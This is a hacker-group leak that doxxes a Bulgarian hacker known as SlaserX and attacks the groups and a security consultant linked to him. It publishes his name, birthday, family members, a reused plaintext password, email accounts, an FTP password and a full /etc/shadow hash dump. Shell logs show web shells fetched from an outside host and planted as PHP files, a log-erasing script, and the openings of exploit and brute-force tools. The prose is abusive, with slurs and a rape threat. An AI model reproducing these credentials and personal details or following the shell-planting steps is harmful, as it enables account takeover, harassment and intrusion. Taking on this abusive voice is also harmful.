1
   2
   3
   4
   5
   6
   7
   8
   9
  10
  11
  12
  13
  14
  15
  16
  17
  18
  19
  20
  21
  22
  23
  24
  25
  26
  27
  28
  29
  30
  31
  32
  33
  34
  35
  36
  37
  38
  39
  40
  41
  42
  43
  44
  45
  46
  47
  48
  49
  50
  51
  52
  53
  54
  55
  56
  57
  58
  59
  60
  61
  62
  63
  64
  65
  66
  67
  68
  69
  70
  71
  72
  73
  74
  75
  76
  77
  78
  79
  80
  81
  82
  83
  84
  85
  86
  87
  88
  89
  90
  91
  92
  93
  94
  95
  96
  97
  98
  99
 100
 101
 102
 103
 104
 105
 106
 107
 108
 109
 110
 111
 112
 113
 114
 115
 116
 117
 118
 119
 120
 121
 122
 123
 124
 125
 126
 127
 128
 129
 130
 131
 132
 133
 134
 135
 136
 137
 138
 139
 140
 141
 142
 143
 144
 145
 146
 147
 148
 149
 150
 151
 152
 153
 154
 155
 156
 157
 158
 159
 160
 161
 162
 163
 164
 165
 166
 167
 168
 169
 170
 171
 172
 173
 174
 175
 176
 177
 178
 179
 180
 181
 182
 183
 184
 185
 186
 187
 188
 189
 190
 191
 192
 193
 194
 195
 196
 197
 198
 199
 200
 201
 202
 203
 204
 205
 206
 207
 208
 209
 210
 211
 212
 213
 214
 215
 216
 217
 218
 219
 220
 221
 222
 223
 224
 225
 226
 227
 228
 229
 230
 231
 232
 233
 234
 235
 236
 237
 238
 239
 240
 241
 242
 243
 244
 245
 246
 247
 248
 249
 250
 251
 252
 253
 254
 255
 256
 257
 258
 259
 260
 261
 262
 263
 264
 265
 266
 267
 268
 269
 270
 271
 272
 273
 274
 275
 276
 277
 278
 279
 280
 281
 282
 283
 284
 285
 286
 287
 288
 289
 290
 291
 292
 293
 294
 295
 296
 297
 298
 299
 300
 301
 302
 303
 304
 305
 306
 307
 308
 309
 310
 311
 312
 313
 314
 315
 316
 317
 318
 319
 320
 321
 322
 323
 324
 325
 326
 327
 328
 329
 330
 331
 332
 333
 334
 335
 336
 337
 338
 339
 340
 341
 342
 343
 344
 345
 346
 347
 348
 349
 350
 351
 352
 353
 354
 355
 356
 357
 358
 359
 360
 361
 362
 363
 364
 365
 366
 367
 368
 369
 370
 371
 372
 373
 374
 375
 376
 377
 378
 379
 380
 381
 382
 383
 384
 385
 386
 387
 388
 389
 390
 391
 392
 393
 394
 395
 396
 397
 398
 399
 400
 401
 402
 403
 404
 405
 406
 407
 408
 409
 410
 411
 412
 413
 414
 415
 416
 417
 418
 419
 420
 421
 422
 423
 424
 425
 426
 427
 428
 429
 430
 431
 432
 433
 434
 435
 436
 437
 438
 439
 440
 441
 442
 443
 444
 445
 446
 447
 448
 449
 450
 451
 452
 453
 454
 455
 456
 457
 458
 459
 460
 461
 462
 463
 464
 465
 466
 467
 468
 469
 470
 471
 472
 473
 474
 475
 476
 477
 478
 479
 480
 481
 482
 483
 484
 485
 486
 487
 488
 489
 490
 491
 492
 493
 494
 495
 496
 497
 498
 499
 500
 501
 502
 503
 504
 505
 506
 507
 508
 509
 510
 511
 512
 513
 514
 515
 516
 517
 518
 519
 520
 521
 522
 523
 524
 525
 526
 527
 528
 529
 530
 531
 532
 533
 534
 535
 536
 537
 538
 539
 540
 541
 542
 543
 544
 545
 546
 547
 548
 549
 550
 551
 552
 553
 554
 555
 556
 557
 558
 559
 560
 561
 562
 563
 564
 565
 566
 567
 568
 569
 570
 571
 572
 573
 574
 575
 576
 577
 578
 579
 580
 581
 582
 583
 584
 585
 586
 587
 588
 589
 590
 591
 592
 593
 594
 595
 596
 597
 598
 599
 600
 601
 602
 603
 604
 605
 606
 607
 608
 609
 610
 611
 612
 613
 614
 615
 616
 617
 618
 619
 620
 621
 622
 623
 624
 625
 626
 627
 628
 629
 630
 631
 632
 633
 634
 635
 636
 637
 638
 639
 640
 641
 642
 643
 644
 645
 646
 647
 648
 649
 650
 651
 652
 653
 654
 655
 656
 657
 658
 659
 660
 661
 662
 663
 664
 665
 666
 667
 668
 669
 670
 671
 672
 673
 674
 675
 676
 677
 678
 679
 680
 681
 682
 683
 684
 685
 686
 687
 688
 689
 690
 691
 692
 693
 694
 695
 696
 697
 698
 699
 700
 701
 702
 703
 704
 705
 706
 707
 708
 709
 710
 711
 712
 713
 714
 715
 716
 717
 718
 719
 720
 721
 722
 723
 724
 725
 726
 727
 728
 729
 730
 731
 732
 733
 734
 735
 736
 737
 738
 739
 740
 741
 742
 743
 744
 745
 746
 747
 748
 749
 750
 751
 752
 753
 754
 755
 756
 757
 758
 759
 760
 761
 762
 763
 764
 765
 766
 767
 768
 769
 770
 771
 772
 773
 774
 775
 776
 777
 778
 779
 780
 781
 782
 783
 784
 785
 786
 787
 788
 789
 790
 791
 792
 793
 794
 795
 796
 797
 798
 799
 800
 801
 802
 803
 804
 805
 806
 807
 808
 809
 810
 811
 812
 813
 814
 815
 816
 817
 818
 819
 820
 821
 822
 823
 824
 825
 826
 827
 828
 829
 830
 831
 832
 833
 834
 835
 836
 837
 838
 839
 840
 841
 842
 843
 844
 845
 846
 847
 848
 849
 850
 851
 852
 853
 854
 855
 856
 857
 858
 859
 860
 861
 862
 863
 864
 865
 866
 867
 868
 869
 870
 871
 872
 873
 874
 875
 876
 877
 878
 879
 880
 881
 882
 883
 884
 885
 886
 887
 888
 889
 890
 891
 892
 893
 894
 895
 896
 897
 898
 899
 900
 901
 902
 903
 904
 905
 906
 907
 908
 909
 910
 911
 912
 913
 914
 915
 916
 917
 918
 919
 920
 921
 922
 923
 924
 925
 926
 927
 928
 929
 930
 931
 932
 933
 934
 935
 936
 937
 938
 939
 940
 941
 942
 943
 944
 945
 946
 947
 948
 949
 950
 951
 952
 953
 954
 955
 956
 957
 958
 959
 960
 961
 962
 963
 964
 965
 966
 967
 968
 969
 970
 971
 972
 973
 974
 975
 976
 977
 978
 979
 980
 981
 982
 983
 984
 985
 986
 987
 988
 989
 990
 991
 992
 993
 994
 995
 996
 997
 998
 999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
1050
1051
1052
1053
1054
1055
1056
1057
1058
1059
1060
1061
1062
1063
1064
1065
1066
1067
1068
1069
1070
1071
1072
1073
1074
1075
1076
1077
1078
1079
1080
1081
1082
1083
1084
1085
1086
1087
1088
1089
1090
1091
1092
1093
1094
1095
1096
1097
1098
1099
1100
1101
1102
1103
1104
1105
1106
1107
1108
1109
1110
1111
1112
1113
1114
1115
1116
1117
1118
1119
1120
1121
1122
1123
1124
1125
1126
1127
1128
1129
1130
1131
1132
1133
1134
1135
1136
1137
1138
1139
1140
1141
1142
1143
1144
1145
1146
1147
1148
1149
1150
1151
1152
1153
1154
1155
1156
1157
1158
1159
1160
1161
1162
1163
1164
1165
1166
1167
1168
1169
1170
1171
1172
1173
1174
1175
1176
1177
1178
1179
1180
1181
1182
1183
1184
1185
1186
1187
1188
1189
1190
1191
1192
1193
1194
1195
1196
1197
1198
1199
1200
1201
1202
1203
1204
1205
1206
1207
1208
1209
1210
1211
1212
1213
1214
1215
1216
1217
1218
1219
1220
__________ __ _____ __________.__
\______ \__ _ _______/ |_ / | | \______ \ |__ __ __ ____
| ___/\ \/ \/ / \ __\ / | |_ | ___/ | \| | \/ \
| | \ / | \ | / ^ / | | | Y \ | / | \
|____| \/\_/|___| /__| \____ | |____| |___| /____/|___| /
\/ |__| \/ \/
LOL > SlaserX < LOL
LOL > Pirate-Sky < LOL
LOL > SecurityGuy < LOL
* LOL * SlaserX * LOL *
SlaserX is a well-known criminal and wannabe hacker from Bulgaria. He's been around for quite some time now. A few weeks ago the miserable idiot and his fellow minions got finally busted and the misguided cops mistakenly claimed to have arrested the most powerful hacker group in Bulgaria[1]. Wait, what?!
Cops, Y U so unbelievably stupid? You're nothing but miserable media whores. We've been fucking around with these kids and we certainly know how 1337 they are. We've got their passwords, we've been reading through their mail spools, we've been laughing at their hacking attempts and yet, you call them the most powerful hacker group. Yes, some of the most talented hackers worldwide are actually based in Eastern Europe, but you silly bitches won't ever hear about them. Suck on my hard cock and and die, brainless cunts! How the fuck can you even be so stupid and lame?
Take a seat, enjoy this leak and remember.. this is absolutely nothing compared to what we've done to you, idiots.
[1] http://press.mvr.bg/en/News/news120704_08.htm
>> So, who's this guy?
First Name: Ivan
Last Name: Bachvarov
Nickname: SlaSerX
Birthday: 21.07.1986
Height: 1.76cm
Father: Jecho Bachvarov
Sister: Mariana Bachvarova
Girlfriend: Mihaela Mandalcheva
Location: Burgas, Bulgaria
>> Let's take a look at what his passwords look like.
vbox7.com (slaserx:1986125),
hit.bg (slaserx:1986125),
theunkn0wn.org (slaserx:1986125),
kaldata.com (slaserx:1986125),
bghelp.bg (slaserx:1986125),
etc.
>> Yes, password reusage is so typical for these idiots. You still call yourself a hacker? Here are some of his already owned mail boxes.
slaserx@abv.bg
froztfi2@abv.bg
slaserx@dir.bg
routeros@abv.bg
slaserx@mbox.contact.bg
>> Guess how 1337 his passwords were? ;) Now let's take a look at some of his boxes.
root@bgdns:/root# uname -a
Linux bgdns 2.6.32-5-686 #1 SMP Wed Jan 12 04:01:41 UTC 2011 i686 GNU/Linux
root@bgdns:/root# w
23:15:45 up 6:26, 2 users, load average: 0.08, 0.09, 0.09
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 office 16:51 6:23m 0.42s 0.42s -bash
root pts/1 office 17:37 5:17m 0.34s 0.34s -bash
root@bgdns:/root# cat /etc/shadow
root:$6$OeWqv5cY$zN9ZVm79q0KLjbsWI.HG0MMlUPiv6c2PrOtYwHJt1UFtcgXwhIgY63u0ZQuMXnWlUN4rKCDbf9Qb7jwC.Bdpp.:15024:0:99999:7:::
daemon:*:15024:0:99999:7:::
bin:*:15024:0:99999:7:::
sys:*:15024:0:99999:7:::
sync:*:15024:0:99999:7:::
games:*:15024:0:99999:7:::
man:*:15024:0:99999:7:::
lp:*:15024:0:99999:7:::
mail:*:15024:0:99999:7:::
news:*:15024:0:99999:7:::
uucp:*:15024:0:99999:7:::
proxy:*:15024:0:99999:7:::
www-data:*:15024:0:99999:7:::
backup:*:15024:0:99999:7:::
list:*:15024:0:99999:7:::
irc:*:15024:0:99999:7:::
gnats:*:15024:0:99999:7:::
nobody:*:15024:0:99999:7:::
libuuid:!:15024:0:99999:7:::
Debian-exim:!:15024:0:99999:7:::
statd:*:15024:0:99999:7:::
sshd:*:15024:0:99999:7:::
slaserx:$6$XW1z1pT4$h/y7KaZRtOjijhnQLV4nIeBwMggaX/WwPTCVEUasRnUwKMIs1NVA70/4EwE/wDQTsH/xgzYQeEgtaiP3NtEkx1:15031:0:99999:7:::
postfix:*:15024:0:99999:7:::
mysql:!:15024:0:99999:7:::
bind:*:15024:0:99999:7:::
polw:!:15024:0:99999:7:::
postgrey:*:15024:0:99999:7:::
proftpd:!:15024:0:99999:7:::
ftp:*:15024:0:99999:7:::
vmail:!:15024:0:99999:7:::
vu2000:!:15024:0:99999:7:::
vu2001:!:15024:0:99999:7:::
vu2002:!:15024:0:99999:7:::
vu2003:!:15024:0:99999:7:::
snmp:*:15025:0:99999:7:::
vu2004:!:15025:0:99999:7:::
vu2005:!:15031:0:99999:7:::
vu2006:!:15034:0:99999:7:::
vu2007:!:15034:0:99999:7:::
vu2008:!:15035:0:99999:7:::
messagebus:*:15038:0:99999:7:::
lbcd:*:15038:0:99999:7:::
vu2009:!:15039:0:99999:7:::
>> Ever wondered what the most powerful hacker tools look like? Well, take look..
root@bgdns:/root# head -25 l33t/a.pl
#!/usr/bin/perl
use IO::Socket;
print q{
#######################################################################
# vBulletin. Version 4.0.1 Remote SQL Injection Exploit #
# By indoushka #
# www.iq-ty.com/vb #
# Souk Naamane (00213771818860) #
# Algeria Hackerz (indoushka@hotmail.com) #
# Dork: Powered by vBulletin. Version 4.0.1 #
#######################################################################
};
if (!$ARGV[2]) {
print q{
Usage: perl VB4.0.1.pl host /directory/ victim_userid
perl VB4.0.1.pl www.vb.com /forum/ 1
};
root@bgdns:/root# head -5 l33t/gen
#!/usr/bin/perl
##
### bren.pl . Generate every character combination for 15 characters in length(ughh.)
##
#
root@bgdns:/root# head -30 l33t/t.pl
#!/usr/bin/perl
use IO::Socket;
use LWP::Simple;
use MIME::Base64;
$host = $ARGV[0];
$user = $ARGV[1];
$port = $ARGV[2];
$list = $ARGV[3];
$file = $ARGV[4];
$url = "http://".$host.":".$port;
if(@ARGV < 3){
print q(
###############################################################
# Cpanel Password Brute Force Tool #
###############################################################
# usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
#-------------------------------------------------------------#
# [Host] : victim Host (simorgh-ev.com) #
# [User] : User Name (demo) #
# [PORT] : Port of Cpanel (2082) #
#[list] : File Of password list (list.txt) #
# [File] : file for save password (password.txt) #
# #
###############################################################
# (c)oded By Hessam-x / simorgh-ev.com #
###############################################################
);exit;}
root@bgdns:/root# tar tvf tools.tar
drwxr-xr-x root/root 0 2011-02-11 11:14 tools/
-rwxr-xr-x root/root 904 2011-01-15 18:18 tools/stop.flood
-rwxr-xr-x root/root 700 2011-01-15 18:21 tools/monitor
-rw-r--r-- slaserx/slaserx 1800 2011-02-11 11:11 tools/shells.zip
-rwxr-xr-x root/root 1853 2011-02-07 18:30 tools/check.ssh
drwxr-xr-x root/root 0 2011-01-16 19:45 tools/sms/
-rwxr-xr-x root/root 1360 2011-01-16 19:26 tools/sms/212.70.159.86
-rwxr-xr-x root/root 1332 2011-01-16 19:41 tools/sms/212.70.159.82-m
-rwxr-xr-x root/root 1326 2011-01-16 19:42 tools/sms/212.70.159.86-m
-rwxr-xr-x root/root 1271 2011-01-16 19:30 tools/sms/7.7.7.7
-rwxr-xr-x root/root 1331 2011-01-16 19:43 tools/sms/212.70.159.87-m
-rwxr-xr-x root/root 630 2011-01-19 09:47 tools/sms/run
-rwxr-xr-x root/root 1333 2011-01-16 19:42 tools/sms/212.70.159.83-m
-rwxr-xr-x root/root 1365 2011-01-16 19:27 tools/sms/212.70.159.87
-rwxr-xr-x root/root 1367 2011-01-16 18:50 tools/sms/212.70.159.83
-rwxr-xr-x root/root 1366 2011-01-16 18:49 tools/sms/212.70.159.82
-rwxr-xr-x root/root 1332 2011-01-16 19:40 tools/sms/94.156.142.99-m
-rwxr-xr-x root/root 1366 2011-01-16 18:45 tools/sms/94.156.142.99
-rwxr-xr-x root/root 528 2011-01-15 18:20 tools/unban
-rwxr-xr-x root/root 526 2011-01-15 18:19 tools/ban
-rwxr-xr-x root/root 136 2011-01-15 18:36 tools/grep.404
-rwxr-xr-x root/root 468 2011-01-15 18:35 tools/logged
-rwxr-xr-x root/root 302 2011-01-15 18:22 tools/dellog
-rw-r--r-- root/root 14 2011-02-07 18:30 tools/bannedips.txt
drwxr-xr-x root/root 0 2011-02-11 14:38 tools/shells/
-rwxr-xr-x root/root 143 2010-07-16 13:41 tools/shells/find.r57
-rwxr-xr-x root/root 12 2010-07-16 13:45 tools/shells/a
-rwxr-xr-x root/root 144 2010-07-16 13:56 tools/shells/find.eval
-rwxr-xr-x root/root 178 2010-07-16 14:35 tools/shells/find.shell
-rwxr-xr-x root/root 144 2010-07-16 13:45 tools/shells/find.rt13
-rwxr-xr-x root/root 153 2010-07-16 13:49 tools/shells/find.decode
-rwxr-xr-x root/root 34461 2011-02-11 14:40 tools/shells/scan.txt
-rwxr-xr-x root/root 143 2010-06-30 14:57 tools/shells/find.c99
drwxr-xr-x root/root 0 2011-02-04 20:46 tools/backup/
-rwxr-xr-x root/root 641 2011-02-04 20:44 tools/backup/backup-rsbg
-rwxr-xr-x root/root 657 2011-02-04 20:45 tools/backup/backup-slaserx
-rwxr-xr-x root/root 271 2011-02-07 11:23 tools/backup/run
-rwxr-xr-x root/root 650 2011-02-04 20:41 tools/backup/backup-psc
root@bgdns:/root# tar tzvf t.tar.gz
drwxr-xr-x root/root 0 2011-03-01 20:20 l33t/
-rwxr-xr-x root/root 2358 2011-02-28 17:26 l33t/a.pl
-rwxr-xr-x root/root 961923 2011-02-27 01:31 l33t/list.txt
-rwxr-xr-x root/root 18883 2010-12-20 01:09 l33t/slowloris.pl
-rwxr-xr-x root/root 156 2011-03-01 18:17 l33t/test.txt
-rwxrwxrwx root/root 11 2011-02-28 17:26 l33t/a
-rwx--x--x root/root 66502 2011-02-27 06:46 l33t/list.txt.save
-rw-r--r-- root/root 20056 2011-03-01 20:21 l33t/ssh2ftpcrack.tar.bz2
-rwxr-xr-x root/root 2109 2011-02-27 00:51 l33t/t.pl
-rwxr-xr-x root/root 6359 2011-02-27 00:52 l33t/gen
root@bgdns:/root# cat .bash_alias
# some more ls aliases
alias less='less -SR'
alias l='ls -lLBhX --time-style=locale'
alias la='ls -la $1 | less'
alias ll='ls -lX'
alias lx='ls -lXB' #sort by ext
alias lk='ls -lSr' #soft by size
# Alias's to modifed commands
alias ps='ps auxf'
alias home='cd ~'
alias pg='ps aux | grep' #requires an argument
alias lg='ls -la | grep' #requires an argument
alias un='tar -zxvf'
alias df='df -hT'
alias ping='ping -c 10'
#alias net-restart='sudo /etc/init.d/networking restart'
#alias windir="cd '/home/hkvn/.wine/drive_c/Program Files'"
alias ..='cd ..'
alias update='sudo apt-get update'
alias upgrade='sudo apt-get upgrade'
alias install='sudo apt-get install'
alias remove='sudo apt-get remove'
#alias eclipse='eclipse -vmargs -Xmx512M'
#alias firefox='firefox-3.5'
alias ipconfig='ifconfig -a'
#My alias
alias flood='netstat'
alias stop='/root/tools/stop.flood'
alias ban='/root/tools/ban.pl'
alias unban='/root/tools/unban.pl'
alias monitor='/root/tools/monitor.sh'
alias cron='env EDITOR=nano crontab -e'
alias editcfg='pico /var/www/ispcp/gui/index.php'
alias arest='/etc/init.d/apache2 restart'
alias cls='clear'
alias q='exit'
# Some ssh connections
alias shell='ssh -l slaserx slaserx.ath.cx'
#alias xalo='sudo vpnc-connect xalo.conf'
# Some ping commands
#alias pga='ping 192.168.1.1 -c 10'
#alias pgo='ping google.com -c 10'
#alias phk='ping hkvn.info -c 10'
#alias pch='ping chuyenhungyen.org -c 10'
#Some chmod commands
alias mx='chmod a+x'
alias 000='chmod 000'
alias 644='chmod 644'
alias 755='chmod 755'
# cat .bash_history
clear
nmap localhost
exit
host perfektno.com
w
iptables -L |grep 77.78.36.40
ban 77.78.36.40
pico /etc/init.d/firewall
ls -a
iptables -L
clear
search metaspolit
search metasploit
search icmp rate
pico /etc/init.d/firewall
iptables -L
stop
flood
clear
exit
pico /etc/networks
pico /etc/network/interfaces
exit
host cs-adrenalines.info
host 79.124.67.194
stop
flood
cat /var/log/fail2ban.log
cat /var/log/psad/fw_check
cat /var/log/psad/top_attackers
clear
clear
stop
exit
cd l33t/
wget https://cirt.net/nikto/nikto-2.1.4.tar.bz2
ls -a
wget
wget --help
wget --help |grep ssl
wget --no-check-certificate https://cirt.net/nikto/nikto-2.1.4.tar.bz2
tar -jxvf nikto-2.1.4.tar.bz2
cd nikto-2.1.4/
ls -a
./nikto.pl
./nikto.pl -host abv.bg -root
./nikto.pl -host abv.bg -root+
./nikto.pl -host abv.bg
./nikto.pl
./nikto.pl -host
./nikto.pl -host pweb.co.cc
w
last
flood
stop
apachectl restart
stop
apachectl restart
cd /root/tools/
./dellog
cat /var/log/apache2/pirate-sky.info-combined.log
cat /var/log/apache2/pirate-sky.info-combined.log
cat /var/log/apache2/pirate-sky.info-combined.log
iptables -L
host eco.gov.kz
cat /var/log/apache2/pirate-sky.info-combined.log
apachectl restart
apachectl restart
ls -a
cron
cron
/etc/init.d/cron restart
cd /var/www/virtual/warez-database.org/htdocs/
ls -a
cd hooks/
ls -a
cd ..
ls -a
cd converge_local/
ls -a
ls -a
ls -a
wget xpls.hit.bg/shell/shell.gif
rm -rf shell.gif
wget xpls.hit.bg/shell/linuxbg.shell
wget xpls.hit.bg/shell/linuxbg.gif
rm -rf linuxbg.*
ls -a
ls -a
mv /home/slaserx/faq.php ./
ls -a
rm -rf .htaccess
ls -a
rm -rf faq.php
/
cd /
pico /var/www/virtual/linuxbg.info/htdocs/pr00f/index.php
pico /var/www/virtual/linuxbg.info/htdocs/pr00f/index.php
clear
whois privatecrew.net
whois privatecrew.net
whois bgdns.info
host freebsd.bg
clear
genpasswd
clear
genpasswd
genpasswd
genpasswd
ls -a
cd /var/www/virtual/privatecrew.net/htdocs/
ls -s
ls -a
rm -rf *
ls -a
ls -a
cd ..
cp ../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2 ./
ls -a
cat ../pirate-sky.info/htdocs/conf_global.php
ls -a
cp pirate-sky.info-backup-2011.03.06-000737.tar.bz2 backups/
clear
ls -a
rm -rf pirate-sky.info-backup-2011.03.06-000737.tar.bz2
rm -rf backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2
genpasswd
genpasswd
genpasswd
ls -a
cd htdocs/
ls -a
pico /etc/init.d/firewall
cat /etc/init.d/firewall
iptables -t filter -A INPUT -s 95.42.32.36 -j ACCEPT
pico /etc/init.d/firewall
/etc/init.d/firewall
flood
stop
ls -a
iptables -L |grep 94.156.142.66
iptables -L |grep lucifer
stop
iptables -L |grep 95.42.32.36
iptables -L
cd /var/www/fcgi/
ls -a
pico warez-database.org/php5/php.ini
pico privatecrew.net/php5/php.ini
pico privatecrew.net/php5/php.ini
apachectl restart
pico privatecrew.net/php5/php.ini
apachectl restart
ls -a
pico pirate-sky.com/php5/php.ini
pico privatecrew.net/php5/php.ini
apachectl restart
cd /root/tools/
ls -a
cd shells/
pico new.p
pico new
ls -a
./a
ls -a
pico find.r57
pico new
./find.
./new
ls -a
ls -a
cd /var/www/virtual/
ls -a
cd privatecrew.net/htdocs/
cd /root/tools/
cd shells/
./new
ls -a
pico new
pico find.eval
ls -a
pico new
pico new
./new
ls -a
pico new
ls -a
./new
ls -a
pico new
ls -a
./new
pico new
./new
ls -a
rm -rf new
pico find.shell
cat scan.txt
pico scan.txt
rm -rf scan.txt
ls -a
./find.shell
ls -a
cat scan.txt
ls -a
rm -rf scan.txt
cat sc
ls -a
pico find.shell
pico find.shell
./find.shell
cat scan.txt
rm -rf scan.txt
ls -a
./find.shell
cat scan.txt
cat scan.txt |grep faq.php
ls -a
rm -rf scan.txt
pico /var/www/virtual/privatecrew.net/htdocs/faq.php
pico find.shell
ls -a
./find.
./find.shell
cat scan.txt
ls -a
clear
cd /var/www/virtual/
ls -a
cd privatecrew.net/
ls -a
cd htdocs/
cd 0893552070/
ls -a
wget http://xpls.hit.bg/shell/c99.gif
wget http://xpls.hit.bg/shell/devil.gif
wget http://xpls.hit.bg/shell/linux.gif
ls -a
mv linux.gif linux.php
ls -a
mv devil.gif devil.php
mv c99.gif c99.php
ls -a
wget http://xpls.hit.bg/shell/shell.gif
mv shell.gif shell.php
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
cp linux.php /var/www/virtual/linuxbg.info/htdocs/pr00f/forum/ranks/
rm -rf /var/www/virtual/linuxbg.info/htdocs/pr00f/forum/ranks/linux.php
ls -a
ls -a
ls -a
clear
ls -a
cd ..
rm -rf 0893552070/
ls -a
exit
ls -a
ls -a
cd /var/www/virtual/pirate-sky.
cd /var/www/virtual/privatecrew.net/htdocs/
ls -a
cd a
ls -a
cd asd/
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
rm crontab -l
crontab -l
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
cd ..
ls -a
ls -a
rm -rf admin/
rm -rf cache/
rm -rf con*
ls -a
rm -rf includes/
ls -a
ls -a
rm -rf interface/
rm -rf ips_kernel/
ls -a
rm -rf public/
rm -rf starforum/
ls -a
rm -rf uploads/
ls -a
ls -a
ls -a
cd ..
cd htdocs/
cd ..
cd backups/
ls -a
cp ../../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2
cp ../../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2 ./
ls -a
pico /etc/crontab
ls -a
cd ..
ls -a
cd htdocs/
ls -a
cd ..
cd backups/
rm -rf pirate-sky.info-backup-2011.03.06-000737.tar.bz2
cd ..
cd htdocs/
cd pp/
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
host mikrotik-bg.net
host 195.191.149.89
cat /var/log/cron.log
ls -a
crontab -l
cron
/etc/init.d/cron restart
/etc/init.d/cron status
ls -a
ls -a
cat /var/log/cron.log
cat /var/log/cron.log |grep err
clear
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
cat /var/log/cron.log
ls -a
ls -a
crontab -l
ls -a
ls -a
cat /var/log/cron.log
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls
ls
ls -a
ls -a
ls -a
ls -a
ls -a
ls -la
ls -a
ls -a
ls -a
ls -a
ls -a
cat /var/log/cron.log
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
wget xpls.hit.bg/shell.gif
wget xpls.hit.bg/linux.gif
mv linux.gif linux.php
mv shell.gif shell.php
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
rm -rf /tmp/scan.txt
ls -a
ls -a
ls -la
ls -a
ls -a
ls -a
pico linux.php
ls -a
rm -rf linux.php
rm -rf shell.php
ls -a
ls -a
wget xpls.hit.bg/shell/shell.gif
wget xpls.hit.bg/shell/linux.gif
mv linux.gif linux.php
mv shell.gif shell.php
pico shell.php
ls -a
pico shell.php
ls -a
wget xpls.hit.bg/shell/shell.gif
mv linux.gif linux.php
wget xpls.hit.bg/shell/linux.gif
ls -a
mv linux.gif linux.php
mv shell.gif shell.php
ls -a
ls -a
ls -a
ls -a
ls -a
cat /tmp/scan.txt
ls -a
ls -a
ls -a
ls -a
cat /var/log/cron.log
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
ls -a
cd ..
cd ..
cd ..
cd ..
exit
cd /var/www/virtual/
ls -a
cd linuxbg.info/
cd backups/
ls -a
rm -rf t3es_vb.sql.bz2
ls -a
rm -rf t3es_soze.sql.bz2
ls -a
whois cms-bg.com
whois jump.bg
stop
cat /tmp/scan.txt
cat /var/log/apache2/other_vhosts_access.log
cat /var/log/apache2/default-error.log
clear
cat /var/log/apache2/default-error.log
clear
cat /var/log/apache2/default-error.log
cat /var/log/apache2/default-error.log
cat /var/log/apache2/default-error.log
clear
clear
clear
exit
os -a
pico /etc/init.d/firewall
ping abv.bg
ls -a
exit
root@bgdns:/root/tools/backup# cat backup-psc
#!/bin/sh
#Created by SlaSerX
#red='1;31m'
TARGET_EMAIL="359887538110@sms.mtel.net"
# local directory to pickup *.tar.gz file
tar zcvf /backup/psc/pirate-sky.$(date +%s).$(date +"%d-%m-%Y").tgz /var/www/virtual/pirate-sky.com/backups/
# ftp remote connections
FTPU="backup" # ftp login name
FTPP="1986125" # ftp password
FTPS="85.217.204.199" # remote ftp server
FTPF="/home/backup/psc/" # remote ftp server directory for $FTPU & $FTPP
LOCALD="/backup/psc/*.tgz"
ncftpput -m -u $FTPU -p $FTPP $FTPS $FTPF $LOCALD
echo
echo -e " \e[${red} Upload psc Backup \e[m"
echo 'pirate-sky' | mail -s "Backup Uploaded:" $TARGET_EMAIL
echo
root@bgdns:/root/tools# head -10 check.ssh
#!/usr/bin/perl
##############################################################################
# By BumbleBeeWare.com 2006
# SSH Log Checker
# sshlogcheck.cgi
# reads ssh log and blocks hacking attempts using ip tables
##############################################################################
# CONFIGURE
##############################################################################
root@bgdns:/root/tools# cat dellog
#!/bin/bash
#Created by SlaSerX
red='1;31m'
/bin/rm -rf /var/log/apache2/*.log
/bin/rm -rf /var/log/apache2/*.log.*
/bin/rm -rf /var/log/apache2/users/*.log
/bin/rm -rf /var/log/apache2/users/*.log.*
/etc/init.d/apache2 restart
echo -e " \e[${red} Apache logs Erase. Apache has been restarted\e[m"
root@bgdns:/root/tools# cat grep.404
grep "404" /var/log/apache2/users/pirate-sky.com-access.log | grep "`date +%d/%b/%Y`" | mailx -s 'SUBJECT GOES HERE' 'routeros@abv.bg'
>> Refer to the URL at the end of the file for some more fun.
* LOL * Pirate-Sky * LOL *
Lamez.org, Pirate-Sky, World Warez Crew, CyberWarrior Invasion Group, etc. are all the same bitches and idiots again and again. They've been continuously renaming their own groups due to all kind of spectacular fails during the years. These are basically brainless infants playing with SQLmap and defacing outdated and improperly configured CMSs.
You can clearly see how randomly they choose their targets -
http://www.zone-h.org/archive/notifier=Cyber%20Warrior%20Invasion
>> Check the aforementioned URL for their databases. ;)
* LOL * SecurityGuy * LOL *
Alexander Sverdlov a.k.a. the SecurityGuy is one of those pseudo-security whores that you'd like to publicly rape. This information security illiterate has been making money through consultancy and training services for ages. Giving your money to this miserable monkey will eventually boost your false sense of security, but nothing more or less. Beware of who you're entrusting your security decisions. Really.
>> Let's just briefly review what's this bitch up to.
nopasara@oss.bg [/home/nopasara/public_html/securityguy]# uname -a
Linux hera.superhosting.bg 2.6.18-194.32.1.el5 #1 SMP Wed Jan 5 17:52:25 EST 2011 x86_64 x86_64 x86_64 GNU/Linux
nopasara@oss.bg [/home/nopasara/public_html/securityguy]# id
uid=32684(nopasara) gid=32686(nopasara) groups=32686(nopasara)
nopasara@oss.bg [/home/nopasara]# ls -lia
total 28108
35897345 drwx--x--x 18 nopasara nopasara 4096 Mar 12 14:04 ./
2 drwx--x--x 660 root root 20480 Mar 19 16:50 ../
